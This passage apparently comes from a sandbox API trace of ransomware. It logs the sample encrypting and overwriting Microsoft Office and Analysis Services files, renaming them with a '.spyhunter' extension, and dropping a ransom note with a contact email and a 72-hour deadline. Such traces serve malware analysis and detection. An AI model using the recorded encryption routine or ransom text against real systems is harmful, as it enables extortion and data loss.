office\\office14\\1033\\vbaows10.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.674] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM") returned 70 [0166.674] StrStrW (lpFirst="VBAOWS10.CHM", lpSrch=".txt") returned 0x0 [0166.674] GetProcessHeap () returned 0x2c0000 [0166.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.674] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e644*=0x2800, lpOverlapped=0x0) returned 1 [0166.695] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.695] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e644*=0x2800, lpOverlapped=0x0) returned 1 [0166.695] GetProcessHeap () returned 0x2c0000 [0166.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.695] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.695] WriteFile (in: hFile=0x178, lpBuffer=0x248e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x248e684*, lpNumberOfBytesWritten=0x248e644*=0x4, lpOverlapped=0x0) returned 1 [0166.700] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e644*=0x30, lpOverlapped=0x0) returned 1 [0166.700] CloseHandle (hObject=0x178) returned 1 [0166.700] GetProcessHeap () returned 0x2c0000 [0166.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.701] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM.spyhunter") returned 80 [0166.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm.spyhunter")) returned 1 [0166.702] GetProcessHeap () returned 0x2c0000 [0166.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.702] GetProcessHeap () returned 0x2c0000 [0166.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.702] GetProcessHeap () returned 0x2c0000 [0166.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e628 | out: hHeap=0x2c0000) returned 1 [0166.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e680 | out: pbBuffer=0x248e680) returned 1 [0166.702] GetProcessHeap () returned 0x2c0000 [0166.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e678*=0x30) returned 1 [0166.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL") returned 70 [0166.710] StrStrW (lpFirst="UMLVC60R.DLL", lpSrch=".txt") returned 0x0 [0166.710] GetProcessHeap () returned 0x2c0000 [0166.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.710] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e63c*=0x2800, lpOverlapped=0x0) returned 1 [0166.760] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.760] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e63c*=0x2800, lpOverlapped=0x0) returned 1 [0166.760] GetProcessHeap () returned 0x2c0000 [0166.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.760] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.760] WriteFile (in: hFile=0x178, lpBuffer=0x248e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x248e67c*, lpNumberOfBytesWritten=0x248e63c*=0x4, lpOverlapped=0x0) returned 1 [0166.761] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e63c*=0x30, lpOverlapped=0x0) returned 1 [0166.761] CloseHandle (hObject=0x178) returned 1 [0166.761] GetProcessHeap () returned 0x2c0000 [0166.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.761] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL.spyhunter") returned 80 [0166.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll.spyhunter")) returned 1 [0166.763] GetProcessHeap () returned 0x2c0000 [0166.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.763] GetProcessHeap () returned 0x2c0000 [0166.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.763] GetProcessHeap () returned 0x2c0000 [0166.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e478 | out: hHeap=0x2c0000) returned 1 [0166.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e680 | out: pbBuffer=0x248e680) returned 1 [0166.763] GetProcessHeap () returned 0x2c0000 [0166.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e678*=0x30) returned 1 [0166.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.764] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 80 [0166.764] StrStrW (lpFirst="GrooveIntlResource.dll", lpSrch=".txt") returned 0x0 [0166.764] GetProcessHeap () returned 0x2c0000 [0166.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.765] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e63c*=0x2800, lpOverlapped=0x0) returned 1 [0166.766] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.766] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e63c*=0x2800, lpOverlapped=0x0) returned 1 [0166.767] GetProcessHeap () returned 0x2c0000 [0166.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.767] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.767] WriteFile (in: hFile=0x178, lpBuffer=0x248e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x248e67c*, lpNumberOfBytesWritten=0x248e63c*=0x4, lpOverlapped=0x0) returned 1 [0166.779] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e63c*=0x30, lpOverlapped=0x0) returned 1 [0166.779] CloseHandle (hObject=0x178) returned 1 [0166.779] GetProcessHeap () returned 0x2c0000 [0166.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.779] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.spyhunter") returned 90 [0166.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll.spyhunter")) returned 1 [0166.780] GetProcessHeap () returned 0x2c0000 [0166.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.780] GetProcessHeap () returned 0x2c0000 [0166.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.780] GetProcessHeap () returned 0x2c0000 [0166.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecece0 | out: hHeap=0x2c0000) returned 1 [0166.780] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e678 | out: pbBuffer=0x248e678) returned 1 [0166.780] GetProcessHeap () returned 0x2c0000 [0166.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.781] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e670*=0x30) returned 1 [0166.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.782] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 69 [0166.782] StrStrW (lpFirst="BHOINTL.DLL", lpSrch=".txt") returned 0x0 [0166.782] GetProcessHeap () returned 0x2c0000 [0166.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.782] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e634*=0x2778, lpOverlapped=0x0) returned 1 [0166.802] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd888, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.802] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2778, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e634*=0x2778, lpOverlapped=0x0) returned 1 [0166.803] GetProcessHeap () returned 0x2c0000 [0166.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.803] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.803] WriteFile (in: hFile=0x178, lpBuffer=0x248e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x248e674*, lpNumberOfBytesWritten=0x248e634*=0x4, lpOverlapped=0x0) returned 1 [0166.803] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e634*=0x30, lpOverlapped=0x0) returned 1 [0166.803] CloseHandle (hObject=0x178) returned 1 [0166.803] GetProcessHeap () returned 0x2c0000 [0166.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.803] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.spyhunter") returned 79 [0166.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll.spyhunter")) returned 1 [0166.804] GetProcessHeap () returned 0x2c0000 [0166.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.805] GetProcessHeap () returned 0x2c0000 [0166.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.805] GetProcessHeap () returned 0x2c0000 [0166.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7df68 | out: hHeap=0x2c0000) returned 1 [0166.805] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e678 | out: pbBuffer=0x248e678) returned 1 [0166.805] GetProcessHeap () returned 0x2c0000 [0166.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e670*=0x30) returned 1 [0166.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.806] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 93 [0166.806] StrStrW (lpFirst="msmdsrv.rll", lpSrch=".txt") returned 0x0 [0166.806] GetProcessHeap () returned 0x2c0000 [0166.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.806] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e634*=0x2800, lpOverlapped=0x0) returned 1 [0166.813] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.813] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e634*=0x2800, lpOverlapped=0x0) returned 1 [0166.813] GetProcessHeap () returned 0x2c0000 [0166.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.813] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.813] WriteFile (in: hFile=0x178, lpBuffer=0x248e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x248e674*, lpNumberOfBytesWritten=0x248e634*=0x4, lpOverlapped=0x0) returned 1 [0166.829] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e634*=0x30, lpOverlapped=0x0) returned 1 [0166.829] CloseHandle (hObject=0x178) returned 1 [0166.829] GetProcessHeap () returned 0x2c0000 [0166.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.829] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.spyhunter") returned 103 [0166.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.spyhunter")) returned 1 [0166.858] GetProcessHeap () returned 0x2c0000 [0166.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.858] GetProcessHeap () returned 0x2c0000 [0166.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.858] GetProcessHeap () returned 0x2c0000 [0166.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9bb8 | out: hHeap=0x2c0000) returned 1 [0166.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.863] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.863] WriteFile (in: hFile=0x178, lpBuffer=0x248e5a7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e6d0, lpOverlapped=0x0 | out: lpBuffer=0x248e5a7*, lpNumberOfBytesWritten=0x248e6d0*=0x127, lpOverlapped=0x0) returned 1 [0166.864] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.864] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e6d0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e6d0*=0x2ac, lpOverlapped=0x0) returned 1 [0166.864] CloseHandle (hObject=0x178) returned 1 [0166.864] GetProcessHeap () returned 0x2c0000 [0166.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e710 | out: hHeap=0x2c0000) returned 1 [0166.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e670 | out: pbBuffer=0x248e670) returned 1 [0166.864] GetProcessHeap () returned 0x2c0000 [0166.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e668*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e668*=0x30) returned 1 [0166.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.865] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 87 [0166.865] StrStrW (lpFirst="sql90.xsl", lpSrch=".txt") returned 0x0 [0166.865] GetProcessHeap () returned 0x2c0000 [0166.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.865] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e62c*=0x2800, lpOverlapped=0x0) returned 1 [0166.951] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.951] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e62c*=0x2800, lpOverlapped=0x0) returned 1 [0166.952] GetProcessHeap () returned 0x2c0000 [0166.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.952] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.952] WriteFile (in: hFile=0x178, lpBuffer=0x248e66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e62c, lpOverlapped=0x0 | out: lpBuffer=0x248e66c*, lpNumberOfBytesWritten=0x248e62c*=0x4, lpOverlapped=0x0) returned 1 [0167.021] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e62c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e62c*=0x30, lpOverlapped=0x0) returned 1 [0167.021] CloseHandle (hObject=0x178) returned 1 [0167.021] GetProcessHeap () returned 0x2c0000 [0167.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.021] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.spyhunter") returned 97 [0167.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.spyhunter")) returned 1 [0167.023] GetProcessHeap () returned 0x2c0000 [0167.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: 